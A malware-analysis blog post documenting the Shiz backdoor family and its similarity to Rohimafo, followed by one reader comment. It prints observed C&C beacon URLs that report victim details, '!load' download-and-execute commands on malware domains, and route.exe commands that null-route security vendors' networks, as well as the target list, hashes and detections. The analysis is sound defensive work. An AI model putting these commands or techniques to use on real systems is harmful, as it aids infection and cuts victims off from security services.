Shiz and Rohimafo: Malware Cousins

Over the course of the last few weeks, our malware sandboxes have analyzed several interesting specimens with malicious activities that include the making of significant modifications to the routing table on the victim host; the effect of these changes is to essentially null-route a large number of /24 IP blocks, one of which is assigned to the U. S. Department of Justice.

As usual, the malicious activity begins with the running of an initial dropper executable.  This dropper immediately copies itself verbatim into the Windows system directory with an (apparently) randomly generated new file name; examples include 5b8388e0.exe, 593a1edf.exe, and d4f11d84.exe.

The malware then adds an entry to the following Registry key to ensure that the installed version of itself is launched each time the machine restarts:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon

It then launches the installed copy of itself and exits and, as usual, this second process deletes the original sample from the file system.  The dropped malware then injects code into a svchost.exe process, and proceeds to make an initial network connection to its C&C server.  This connection consists of an HTTP GET request to a PHP script with two parameters, such as:

http://193.105.XX.YY/knock.php?n=D01DBA80&s=seller-01

We have always observed the same DWORD value for the first parameter, but have seen at least six different values for the “seller ID” string, including:

seller-01
seller-15
seller-23
seller-25
seller-28

and even, in some dropper samples analyzed back in May 2010:

SELLER_ID_TO_BE_HEREPADDINGPADDINGPADDING [...truncated...]

It is noteworthy that there is no User-Agent provided in this request; in fact, the only HTTP header field present at all is the “Host:” field.

The response from the C&C server included headers that indicated it was powered by Apache/2 with PHP version 5.2.13.  The response consists of a short configuration file in plain text; a representative example is below:

!config
borgherres.com
biologyfozzie.com
b1642ckt.com
7200
!load !68 http://blachowicz.com/ipybnknatrcsae.php?id=1&magic=280736572
7200

In some cases, but not always, the first domain name in the “!config” section is the same as the C&C domain.

The “!load” section contains a URL to download and execute.  In our observations, this URL always contains a randomly-named PHP script with two parameters: an “id” parameter that is always set to 1, and a “magic” parameter that contains a (seemingly) random 9-digit number.  Other representative examples of load commands include:

!load !67 http://b00ger01.com/zt6bgzqn6ww7mz0.php?id=1&magic=866125628
!load !66 http://b0000c454d.com/Hl5OjvG4dRIqx2Y.php?id=1&magic=302293400

The meaning of the numerical “7200” values is not known; perhaps this indicates the number of seconds to wait before checking in again to the C&C server.  We have also observed the values of 4500 instead of 7200 in some cases.

Upon receipt of the load command, the malware will make another HTTP GET request to the first C&C listed in the aforementioned “!config” section; this C&C is often the same C&C that it initially contacts, but sometimes it sends its acknowledgment to a different C&C hostname as specified in the “!config”; again, only a single “Host:” HTTP header is included in this request.  The response headers from the download server also indicate that it is powered by the same web server software as the initial C&C: Apache/2 with PHP 5.2.13.

Although the response header from the download server indicates that the downloaded content is HTML, in actuality it is a large (100KB or more) block of raw binary data.  As it turns out, the downloaded data is really a new executable file that has been weakly obfuscated by XORing against the DWORD 0xA0A0A0A0.  After the download completes, the malware sends an acknowledgment message to the C&C; this acknowledgment consists of another HTTP GET request to the original URL, but with a third GET parameter appended indicating that the “!load” command succeeded:

http://193.105.207.XXX/knock.php?n=D01DBA80&s=seller-01&r=68:load_success;

Note that the request value of “68” was included within the load command as “!68”.  Over the course of several days, we have observed the values of this number slowly increment from 66, to 67, to 68; this suggests it could be a revision number of some kind.  The C&C sends an HTTP response to this acknowledgment containing headers but no bytes of content.

Once the downloaded data is written to the file system, it is XORed against 0xA0A0A0A0 to return it to its original executable form, and then executed.  The file name used is generated according to a pattern exemplified by the following representative samples:

C:WINDOWSTEMPntE808.tmp.exe
C:WINDOWSTEMPntA2EC.tmp.exe
C:WINDOWSTEMPntEBEB.tmp.exe

Once executed, the dropped malware moves itself from C:WindowsTEMP to C:WindowsSystem32 as a randomly-generated new file name, such as:

uwlfoh.exe
xnkhpi.exe
eiqchz.exe

It then restarts itself and begins the process of making permanent modifications to the victim computer’s routing table in order to block access to a list of 205 separate /24 IP blocks.  The list of IP blocks that it null-routes is embedded (in obfuscated form) in the downloaded executable; although a strings analysis of the static binary did not yield any IP addresses, a memory dump of the executing process contained a list of 205 ASCII strings associated with the IP blocks to be null-routed.

The malware proceeds down this list and invokes the Windows route.exe command twice for each IP block:

route.exe -p add 128.111.48.0 mask 255.255.255.0 172.XX.YY.0
route.exe -p add 128.111.48.0 mask 255.255.255.0 0.0.0.255

In our experiments on a Windows XP box, the second route.exe command will fail due to the specified gateway (0.0.0.255) being invalid, but the first route.exe command will succeed and has the effect of null-routing target IP block (128.111.48.0/24 in this case, assigned to UC-Santa Barbara) due to the non-existence of a host with IP address 172.XX.YY.0.  Note that the form of the non-existent gateway appears to be generated dynamically from the IP of the victim machine (which, in the above case, had an RFC1918 IP address of 172.XX.YY.ZZ.)

The complete list of IP blocks that the malware attempts to null-route, along with their associated network names and country codes, is as follows:

AT    128.130.56.0    TECHNISCHE UNIVERSITAT WIEN
AT    128.130.60.0    TECHNISCHE UNIVERSITAT WIEN
BY    195.137.160.0    TUT.BY
CH    193.17.85.0    NINE INTERNET SOLUTIONS AG SWITZERLAND
CZ    212.67.88.0    TARIO OF NEW YORK
CZ    89.202.157.0    COLGATE-PALMOLIVE CESKA REPUBLIKA SPOL. S R.O
CZ    90.183.101.0    NETCENTRUM
DE    188.40.74.0    NETWORK ADDRESS
DE    188.93.8.0    INFRASTRUCTURE
DE    193.24.237.0    INSOFT EDV-SYSTEME GMBH BERLIN
DE    194.112.106.0    CABLE & WIRELESS TELECOMMUNICATION SERVICES GMBH
DE    213.198.89.0    NTT/VERIO EUROPE
DE    62.146.210.0    AVIRA GMBH
DE    62.146.66.0    SKYLIME GBR
DE    62.67.184.0    GRID-SERVICE-GMBH
DE    62.75.163.0    VSERVER - VIRTUAL DEDICATED SERVER-HOSTING
DE    62.75.216.0    SERVER4YOU DEDICATED SERVER HOSTING
DE    78.47.87.0    HETZNER ONLINE AG
DE    80.153.193.0    DEUTSCHE TELEKOM AG
DE    80.190.130.0    HOLTZBRINCK ONLINE SERVICES GMBH
DE    80.190.154.0    AVIRA GMBH
DE    80.237.132.0    HOSTEUROPE GMBH
DE    81.24.35.0    AIXTRANET HERZOGENRATH
DE    82.165.103.0    1&1 INTERNET AG
DE    82.98.86.0    SEDO DOMAIN PARKING
DE    85.214.106.0    STRATO RECHENZENTRUM BERLIN
DE    85.255.19.0    ELEMENT5 AG - A DIGITALRIVER COMPANY
DE    87.106.242.0    1&1 INTERNET AG
DE    87.106.254.0    1&1 INTERNET AG
DE    87.230.79.0    HOSTEUROPE GMBH
EE    195.222.17.0    DIAPOL GRANITE OY
EE    212.47.219.0    MODERA CONSULTING O
ES    195.55.72.0    DIRECCION GENERAL DE TRAFICO
ES    212.8.79.0    GIPUZKOA EMPLOYERS ASSOCIATION
ES    62.14.249.0    IP ADDRESSES FOR JAZZTELBONE CLIENTS
FI    193.110.109.0    F-SECURE OYJ
FI    193.66.251.0    F-SECURE
FR    194.206.126.0    NORDNET SA
FR    195.146.235.0    NORDNET
FR    195.210.42.0    MFX-BORDEAUX
FR    83.202.175.0    FRANCE TELECOM
FR    85.31.222.0    RDMEDIAS
FR    91.121.97.0    OVH SAS
FR    94.23.206.0    OVH SAS
GR    139.91.222.0    FOUNDATION OF RESEARCH AND TECHNOLOGY HELLAS
HU    195.70.37.0    INTERWARE INC
IE    193.1.193.0    NETWORK FOR FTP.HEANET.IE SERVICES
IE    78.137.164.0    LETSHOST
IE    79.125.5.0    AMAZON WEB SERVICES ELASTIC COMPUTE CLOUD EC2 EU
IL    199.203.243.0    ELRON TECHNOLOGIES
IS    213.220.100.0    FRIDRIK SKULASON HF
JP    150.70.93.0    JAPAN NETWORK INFORMATION CENTER
NL    192.150.94.0    IP-EEND
NL    194.109.142.0    XS4ALL INTERNET BV
NL    213.133.34.0    IS INTERNED SERVICES
NL    217.170.21.0    KDIS
NL    85.12.57.0    EUROACCESS
NL    85.17.210.0    LEASEWEB
NO    193.69.114.0    NORMAN DATA DEFENCE SYSTEMS AS LYSAKER
NO    193.71.68.0    NORMAN DATA DEFENCE SYSTEMS AS LYSAKER
NO    87.238.48.0    LINPRO AS
PH    203.160.188.0    PHILIPPINE TELEGRAPH AND TELEPHONE CORPORATION
RO    80.86.107.0    INFRA-AW
RU    195.2.240.0    PETERSBURG INTERNET NETWORK LLC
RU    212.59.118.0    IO-HOSTS LTD
RU    217.106.234.0    MASTAK-TELECOM
RU    217.16.16.0    MASTERHOST.RU IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    217.174.103.0    HTTP://WWW.NIKAMOTORS.RU
RU    62.213.110.0    KASPERSKY LAB
RU    69.20.104.0    CHRONOPAY B.V
RU    78.108.86.0    SAINT-PETERSBURG DEPARTMENT MAJORDOMO LLC
RU    81.176.230.0    KASPERSKY LABS
RU    81.176.66.0    RTCOMM.RU NETWORK
RU    81.176.67.0    RTCOMM.RU NETWORK
RU    81.177.31.0    ESERVER.RU - HOSTING OPERATOR
RU    82.151.107.0    JSC CENTRAL TELECOMMUNICATION COMPANY BRANCH BELSVYAZ
RU    83.102.130.0    CORBINA TELECOM
RU    83.222.23.0    .MASTERHOST
RU    83.222.31.0    MASTERHOST VPS SERVICES
RU    87.242.72.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    87.242.74.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    87.242.75.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    87.242.79.0    MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION
RU    89.108.66.0    AGAVA JSC
RU    89.111.176.0    GARANT-PARK-TELECOM LTD
RU    90.156.159.0    MASTERHOST VPS SERVICES
RU    92.53.106.0    TW NETWORK SOLUTION
RU    93.191.13.0    COLOCATION SERVICES
SK    93.184.71.0    VNET A.S
UA    193.193.194.0    LUCKY NET (COLLOCATION)
UA    194.0.200.0    FREEHOST UA
UA    194.33.180.0    HOSTPRO LTD
UA    195.64.225.0    ELEKTRONNI VISTI LTD (ELVISTI LTD) KYIV UKRAINE
UA    82.117.238.0    VELTON.TELECOM GPON K12 NETWORK
UK    193.0.6.0    EUROPEAN REGIONAL REGISTRY
UK    212.72.62.0    LEVEL 3 COMMUNICATIONS
UK    213.171.218.0    UK'S LARGEST WEB HOSTING COMPANY
UK    213.31.172.0    SOPHOS
UK    62.189.194.0    APPENSE
UK    83.223.117.0    UK NOC
UK    88.221.119.0    AKAMAI TECHNOLOGIES
UK    89.202.149.0    INTEROUTE COMMUNICATIONS LIMITED
UK    91.199.212.0    COMODO CA LTD
UK    91.209.196.0    COMODO CA LTD
UK    92.123.155.0    AKAMAI TECHNOLOGIES
UK    94.236.0.0    NET MEDIA PLANET IP SPACE
UK    95.140.225.0    LIMELIGHT NETWORKS INC
US    128.111.48.0    UNIVERSITY OF CALIFORNIA SANTA BARBARA
US    141.202.248.0    COMPUTER ASSOCIATES INTERNATIONAL
US    149.101.225.0    US DEPT OF JUSTICE
US    155.35.248.0    COMPUTER ASSOCIATES INTERNATIONAL
US    162.40.10.0    SUSQUEHANNA FIRE
US    165.160.15.0    CORPORATION SERVICE COMPANY
US    166.70.98.0    XMISSION L.C
US    174.120.184.0    THEPLANET.COM INTERNET SERVICES INC
US    174.120.185.0    THEPLANET.COM INTERNET SERVICES INC
US    174.120.186.0    THEPLANET.COM INTERNET SERVICES INC
US    174.133.38.0    THEPLANET.COM INTERNET SERVICES INC
US    18.85.2.0    MASSACHUSETTS INSTITUTE OF TECHNOLOGY
US    198.6.49.0    SYMANTEC CORPORATION
US    204.14.90.0    FLUID HOSTING LLC
US    205.178.145.0    NETWORK SOLUTIONS LLC
US    205.227.136.0    LEVEL 3 COMMUNICATIONS INC
US    206.204.52.0    CONXION CORPORATION
US    207.44.154.0    THEPLANET.COM INTERNET SERVICES INC
US    207.44.254.0    THEPLANET.COM INTERNET SERVICES INC
US    207.46.18.0    MICROSOFT CORP
US    207.46.20.0    MICROSOFT CORP
US    207.46.232.0    MICROSOFT CORP
US    207.66.0.0    LEGISLATIVE COUNCIL SERVICE
US    208.43.44.0    SOFTLAYER TECHNOLOGIES INC
US    208.43.71.0    SOFTLAYER TECHNOLOGIES INC
US    208.79.250.0    DIGITAL RIVER INC
US    209.124.55.0    INTERALAB
US    209.157.69.0    NTT AMERICA INC
US    209.160.22.0    HOPONE INTERNET CORPORATION
US    209.216.46.0    WCP/32POINTS INTERMEDIATE HOLDING COMPANY INC
US    209.51.167.0    BLACKMESH INC
US    209.62.112.0    THEPLANET.COM INTERNET SERVICES INC
US    209.62.68.0    THEPLANET.COM INTERNET SERVICES INC
US    209.87.209.0    CHECK POINT SOFTWARE TECHNOLOGIES INC
US    216.10.192.0    SYMANTEC CORPORATION
US    216.12.145.0    SERVERVAULT CORP
US    216.239.122.0    CNET NETWORKS INC
US    216.246.90.0    HOSTFORWEB INC
US    216.49.88.0    MCAFEE INC
US    216.49.94.0    MCAFEE INC
US    216.55.183.0    CODERO
US    216.99.133.0    TREND MICRO INCORPORATED
US    38.113.1.0    PSINET INC
US    63.85.36.0    WS/AKAMAI TECHNOLOGIES/AKAMAI TECHNOLOGIES
US    64.128.133.0    TW TELECOM HOLDINGS INC
US    64.13.134.0    TITAN NETWORKS
US    64.202.189.0    GODADDY.COM INC
US    64.246.4.0    THEPLANET.COM INTERNET SERVICES INC
US    64.41.142.0    JUSTIA INC
US    64.41.151.0    MCAFEE INC
US    64.66.190.0    HOSTWAY CORPORATION
US    64.78.182.0    VIAWEST
US    65.175.38.0    FREEZE FRAME GRAPHICS
US    65.55.184.0    MICROSOFT CORP
US    65.55.240.0    MICROSOFT CORP
US    66.223.50.0    PEER 1 DEDICATED HOSTING
US    66.249.17.0    NAME INTELLIGENCE INC
US    66.77.70.0    QCC QWEST
US    67.134.208.0    NATIONAL EDUCATION ASSOCIATION
US    67.15.103.0    OUR INTERNET INC
US    67.15.231.0    SLY.TV
US    67.19.34.0    THEPLANET.COM INTERNET SERVICES INC
US    67.192.135.0    ROUNDHOUSE LLC
US    67.225.206.0    LIQUID WEB INC
US    67.227.172.0    LIQUID WEB INC
US    68.177.102.0    SOURCEFIRE INC
US    69.162.79.0    LIMESTONE NETWORKS INC
US    69.18.148.0    INVISION.COM INC
US    69.57.142.0    THEPLANET.COM INTERNET SERVICES INC
US    69.93.226.0    THEPLANET.COM INTERNET SERVICES INC
US    70.84.211.0    THEPLANET.COM INTERNET SERVICES INC
US    72.232.246.0    LAYERED TECHNOLOGIES INC
US    72.3.254.0    RACKSPACE HOSTING
US    72.32.125.0    RACKSPACE HOSTING
US    72.32.149.0    BEORRATECH
US    72.32.70.0    RACKSPACE HOSTING
US    74.125.77.0    GOOGLE INC
US    74.208.158.0    1&1 INTERNET INC
US    74.208.20.0    1&1 INTERNET INC
US    74.50.0.0    LUNAR PAGES
US    74.52.233.0    THEPLANET.COM INTERNET SERVICES INC
US    74.53.201.0    THEPLANET.COM INTERNET SERVICES INC
US    74.53.70.0    THEPLANET.COM INTERNET SERVICES INC
US    74.54.130.0    THEPLANET.COM INTERNET SERVICES INC
US    74.54.139.0    THEPLANET.COM INTERNET SERVICES INC
US    74.54.46.0    THEPLANET.COM INTERNET SERVICES INC
US    74.55.143.0    THEPLANET.COM INTERNET SERVICES INC
US    74.55.40.0    THEPLANET.COM INTERNET SERVICES INC
US    74.55.74.0    THEPLANET.COM INTERNET SERVICES INC
US    74.86.125.0    SOFTLAYER TECHNOLOGIES INC
US    74.86.232.0    CLIENT INTELLECT INC
US    75.125.185.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.189.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.212.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.29.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.43.0    THEPLANET.COM INTERNET SERVICES INC
US    75.125.82.0    THEPLANET.COM INTERNET SERVICES INC
US    84.40.30.0    HOSTWAY TPA FL

Upon completion of the null-routing tasks, the malware connects to a new C&C and submits an HTTP GET request to a URL such as:

http://193.105.XX.YY/knok.php?id=SYSTEM!VICTIM!9B88F779&ver=21&up=162&os=XP%20Service%20Pack%202

Note the use of a “knok.php” script instead of “knock.php” as was used for the initial C&C.  Note also that the malware submits the name of the victim computer (VICTIM) along with information regarding the operating system and service pack status.

This 2nd C&C responds with another configuration-like file, such as:

!new_config
besprutaness.com
buffeter.com
bjerkeseth.com/iOsVnczZv5NIYH8.php

This response prompts the malware to download yet another file from the specified PHP script; the downloaded file is (again) a new executable that has been obfuscated by XORing against 0xA0A0A0A0, and is saved to the following location:

C:temp_file_bin

This download server was running slightly older software versions (Apache and PHP 5.2.12 instead of Apache/2 and PHP 5.2.13 as above.)

The malware also injects code into various processes, including EXPLORER.EXE and IEXPLORE.EXE; we have studied neither the behavior nor purpose of this injected code.

Finally, the malware opens up a listening socket on TCP port 14336, and then informs the C&C by sending a final HTTP request to a URL such as:

http://193.105.XX.YY/socks.php?name=SYSTEM!VICTIM!9B88F779&port=14336

We have not verified this via reverse engineering, but it seems reasonable to assume that the intention of the opened port might be to serve as a SOCKS proxy.

The dropped malware uses the following mutex to prevent multiple copies of itself from running simultaneously:

WBEMPROVIDERSTATICMUTEX

Virus detection coverage for the original droppers, as compiled by VirusTotal.com, ranged from 34% to 68% at the time of our analysis, but has improved significantly in the last couple weeks.  Typical detections include:

Backdoor/Win32.Shiz.gen (Antiy-AVL)
Backdoor.Win32.Shiz!IK (Emsisoft)
W32/Shiz!tr.bdr (Fortinet)
Backdoor.Win32.Shiz (Ikarus)
Backdoor.Win32.Shiz.gen (Kaspersky)
Backdoor.Shiz.JJ (VirusBuster)
Trojan:Win32/Meredrop (Microsoft)
W32/Meredrop.FK (Norman)

As far as the dropped (null-routing) malware is concerned, virus detection coverage was not great (about 15%) around the time the sample was first studied, but has since improved over the last few weeks in many cases.

Based on these detections, we have begun using the moniker “Shiz” internally for this family.  MD5 hashes and file sizes for the initial dropper samples we’ve seen include:

64ed993299dc40da0822272fd600cf78  (34,816 bytes)
bb9449e02df8d67a6e2e3a60d8f317b6  (40,448 bytes)
527ad0b6464631ff1dc07b5f282c0d7d  (38,400 bytes)

MD5 hashes (after de-XORing) and file sizes for the dropped null-routing malware include:

aa66aea4c2cbc9de17e213d334131699  (130,560 bytes)
3f6cedccf1d37de2b9957c06437017f7  (105,984 bytes)
56ee94a95ab2ecb41be357f414de533c  (107,520 bytes)

Based on our observations, the C&C servers for this family tend to be hosted in Kazakhstan and Ukraine, and the download servers (where the null-routing malware component lives) are hosted in Russia.

By most counts, the behavior of Shiz is very similar to that of another malware family known as Rohimafo, and described in detail here.

The similarities include the following:

  • The knock.php/knok.php URLs for connecting to the C&C;
  • The null-routing of over 200 /24 IP blocks;
  • The opening of a listening socket (probably a SOCKS proxy);
  • The injection of code into EXPLORER.EXE and IEXPLORE.EXE;
  • Similar modifications to the Registry;

In fact, the 205 IP blocks null-routed by our Shiz samples include the identical 201 blocks null-routed by Rohimafo, plus the following four additions:

EE    195.222.17.0    DIAPOL GRANITE OY
RU    212.59.118.0    IO-HOSTS LTD
RU    81.176.230.0    KASPERSKY LABS
US    74.55.143.0     THEPLANET.COM INTERNET SERVICES INC

Based on these similarities, we have concluded that either Shiz and Rohimafo are essentially the same family of malware, or at the very least that Shiz is a very close descendant and/or variant of Rohimafo.

One Response to “Shiz and Rohimafo: Malware Cousins”

September 17, 2010 at 5:39 pm, Curt Wilson said:

Nice work Jeff. Looks like the malware authors incorporated a list of security company, sandbox, etc related IP’s for null-routing. Speculating that some of the in-the-cloud AV services such as Artemis, Immunet and the like could be temporarily delayed due to this technique once it lands on a box the first time. Nice job and makes for good operational IDS sigs too. @curtw

Comments are closed.